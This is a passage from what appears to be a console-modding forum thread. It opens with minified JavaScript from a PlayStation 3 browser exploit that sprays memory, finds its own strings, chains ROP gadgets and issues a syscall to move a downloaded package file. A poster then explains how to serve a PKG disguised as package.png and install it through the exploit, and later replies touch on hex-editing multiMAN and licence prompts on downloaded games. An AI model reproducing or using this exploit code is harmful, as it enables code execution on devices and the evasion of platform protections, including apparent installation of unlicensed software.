g;while(i\74(e.length*2)){if(e.charCodeAt(i/2)===b.charCodeAt(0)){f=0;for(k=0;k\74(b.length*2);k+=0x2){if(e.charCodeAt((i+k)/2)!==b.charCodeAt(k/2)){break}f+=1}if(f===b.length){g=c+i+4;for(t=0;t\74offset_array.length;t+=1){if(offset_array[t]===g){return-1}}offset_array.push(g);return g}}i+=0x10}var h=c+d;return 0}function stack_frame_hookup(){return unescape("\u4141\u2A2F")+hexw2bin(gadget1_addr)+hexw2bin(toc_addr)+fill_by_16bytes(0x20,dbyte41)+hexdw2bin(toc_addr)+fill_by_16bytes(0x70,dbyte41)}function stack_frame_exit(){return hexdw2bin(gadget_mod8_addr)+unescape("\u2F2A")}function syscall(a,b,c,d,e,f,g,h,i,j){if(j===null){j=gtemp_addr}return hexdw2bin(gadget_mod2_addr)+fill_by_16bytes(0x60,dbyte41)+hexdw2bin(gtemp_addr)+fill_by_16bytes(0x10,dbyte41)+hexdw2bin(gadget_mod1_addr)+fill_by_16bytes(0x50,dbyte41)+fill_by_4bytes(0xC,dbyte41)+hexw2bin(a)+hexw2bin(i)+hexw2bin(g)+hexw2bin(f)+hexw2bin(e)+hexw2bin(d)+hexw2bin(c)+fill_by_4bytes(0x4,dbyte41)+hexw2bin(h)+fill_by_16bytes(0x20,dbyte41)+hexdw2bin(b)+fill_by_16bytes(0x10,dbyte41)+hexdw2bin(gadget_mod2_addr)+fill_by_16bytes(0x60,dbyte41)+hexdw2bin(gtemp_addr)+fill_by_16bytes(0x10,dbyte41)+hexdw2bin(gadget_mod4a_addr)+fill_by_16bytes(0x60,dbyte41)+hexdw2bin(j)+hexdw2bin(sp_exit)+fill_by_8bytes(0x8,dbyte41)}function callsub(a,b,c,d,e,f,g,h,i,j,k,l,m){var n=0x20;if(m===null){m=gtemp_addr}if(l===null){l=gtemp_addr}return hexdw2bin(gadget_mod2_addr)+fill_by_16bytes(0x60,dbyte41)+hexdw2bin(gtemp_addr)+fill_by_16bytes(0x10,dbyte41)+hexdw2bin(gadget_mod1_addr)+fill_by_16bytes(0x50,dbyte41)+fill_by_4bytes(0xC,dbyte41)+hexw2bin(j)+hexw2bin(i)+hexw2bin(g)+hexw2bin(f)+hexw2bin(e)+hexw2bin(d)+hexw2bin(c)+fill_by_4bytes(0x4,dbyte41)+hexw2bin(h)+fill_by_16bytes(0x20,dbyte41)+hexdw2bin(b)+fill_by_16bytes(0x10,dbyte41)+hexdw2bin(gadget_mod2_addr)+fill_by_16bytes(0x60,dbyte41)+hexdw2bin(l)+fill_by_16bytes(0x10,dbyte41)+hexdw2bin(a)+fill_by_16bytes(k-n,dbyte00)+hexdw2bin(m)+hexdw2bin(sp_exit)+fill_by_8bytes(0x8,dbyte41)}function 
fill_by_4bytes(a,b){var c=\47\47;var d=0;var e=hexh2bin(b);while(d\74a/4){c+=e.repeat(2);d++}return c}function fill_by_8bytes(a,b){var c=\47\47;var d=0;var e=hexh2bin(b);while(d\74a/8){c+=e.repeat(4);d++}return c}function fill_by_16bytes(a,b){var c=\47\47;var d=0;var e=hexh2bin(b);while(d\74a/16){c+=e.repeat(8);d++}return c}function initDefaults(){offset_array=[];xtra_data_addr=0;stack_frame_addr=0;jump_2_addr=0;jump_1_addr=0;search_max_threshold=70*0x100000;search_base=0x80100000;search_size=2*mbytes;search_size_ext=0*mbytes;search_base_off=0*mbytes;total_loops++}function initROP(a){try{if(a===true){frame_fails=0;search_base_off=0;search_size_ext=0}if(t_out!==0){clearTimeout(t_out);t_out=0}initDefaults();document.getElementById("init").disabled=true;var b="/dev_hdd0/photo/"+utc+"/package.png";var c="/dev_hdd0/packages/download.pkg";xtra_data=start_x.convert()+b.convert()+c.convert()+unescape("\uFD7E");while(xtra_data_addr===0){if(search_max_threshold\74search_size){load_check();return}xtra_data=xtra_data.replaceAt(0,hexh2bin(0x7EFD));xtra_data_addr=findJsVariableOffset("xtra_data",xtra_data,search_base,search_size);search_max_threshold-=search_size}var d=xtra_data_addr+0x2;var 
f=d+b.convertedSize();stack_frame=stack_frame_hookup()+syscall(0x0000032C,d,f,0,0,0,0,0,0)+stack_frame_exit();while(stack_frame_addr===0){if(search_max_threshold\74search_size+search_size_ext){frame_fails++;if((frame_fails%10)===0){search_base_off+=0;search_size_ext+=0}load_check();return}stack_frame=stack_frame.replaceAt(0,hexh2bin(0x2A2F));stack_frame_addr=findJsVariableOffset("stack_frame",stack_frame,search_base+search_base_off,search_size+search_size_ext);if(stack_frame_addr==-1)if(search_max_threshold\74search_size+search_size_ext){frame_fails++;load_check();return}search_max_threshold-=search_size+search_size_ext}jump_2=unescape("\u0102\u7EFB")+fill_by_16bytes(0x30,0x8282)+hexw2bin(stack_frame_addr)+unescape("\uFB7E");while(jump_2_addr===0){if(search_max_threshold\74search_size){load_check();return}jump_2=jump_2.replaceAt(0,hexh2bin(0x7EFB));jump_2_addr=findJsVariableOffset("jump_2",jump_2,search_base,search_size);if(jump_2_addr==-1)if(search_max_threshold\74search_size){load_check();return}search_max_threshold-=search_size}jump_1=unescape("\u4141\u7EFA")+hexw2bin(jump_2_addr)+unescape("\uFA7E");while(jump_1_addr===0){if(search_max_threshold\74search_size){load_check();return}jump_1=jump_1.replaceAt(0,hexh2bin(0x7EFA));jump_1_addr=findJsVariableOffset("jump_1",jump_1,search_base,search_size);if(jump_1_addr==-1)if(search_max_threshold\74search_size){load_check();return}search_max_threshold-=search_size}var g=checkMemory(stack_frame_addr-0x4,0x8000,stack_frame.length);var x=checkMemory(xtra_data_addr-0x4,0x1000,xtra_data.length);var h=checkMemory(jump_2_addr-0x4,0x1000,jump_2.length);var i=checkMemory(jump_1_addr-0x4,0x1000,jump_1.length);if((h===jump_2)&&(i===jump_1)&&(x===xtra_data)&&(g===stack_frame)){if(t_out!==0){clearTimeout(t_out)}triggerX()}else{load_check()}}catch(e){}}function triggerX(){setTimeout(trigger,1000,jump_1_addr);setTimeout(rop_exit,2000,hr);t_out=0;total_loops=0}');

There are instructions on the page itself, but basically: you start up a web server on your PC and put the PKG you want to install in the root html folder, named package.png. Then enter your server IP in the page and you can download the PKG in the background (you can leave the page while it's downloading). After it's done, click the button and it's renamed into /dev_hdd0/packages. You can change the file paths if you want.

If you try it please give feedback, I'm looking to improve upon this ;)
 
So is it possible to redirect downloads from the web browser on multiman? And if so, how?
Not sure what you mean; what is it you want to do? I did not even know multiman had a browser. Where does multiman download files to by default? You could try looking for the path with a hex editor in the multiman files and editing it there, maybe.
 
Not sure what you mean; what is it you want to do? I did not even know multiman had a browser. Where does multiman download files to by default? You could try looking for the path with a hex editor in the multiman files and editing it there, maybe.

I think I'll try using the hex editor and see what I can do. Since we're already talking about downloads: I've had a slight problem after downloading some games; a message pops up saying that I need to renew my licence via the PS Store. Not sure what to do — I don't want to get banned when I access the PS Store.
 

Attachments

  • 2019-07-22 16.09.47.jpg
    2019-07-22 16.09.47.jpg
    3.1 MB · Views: 145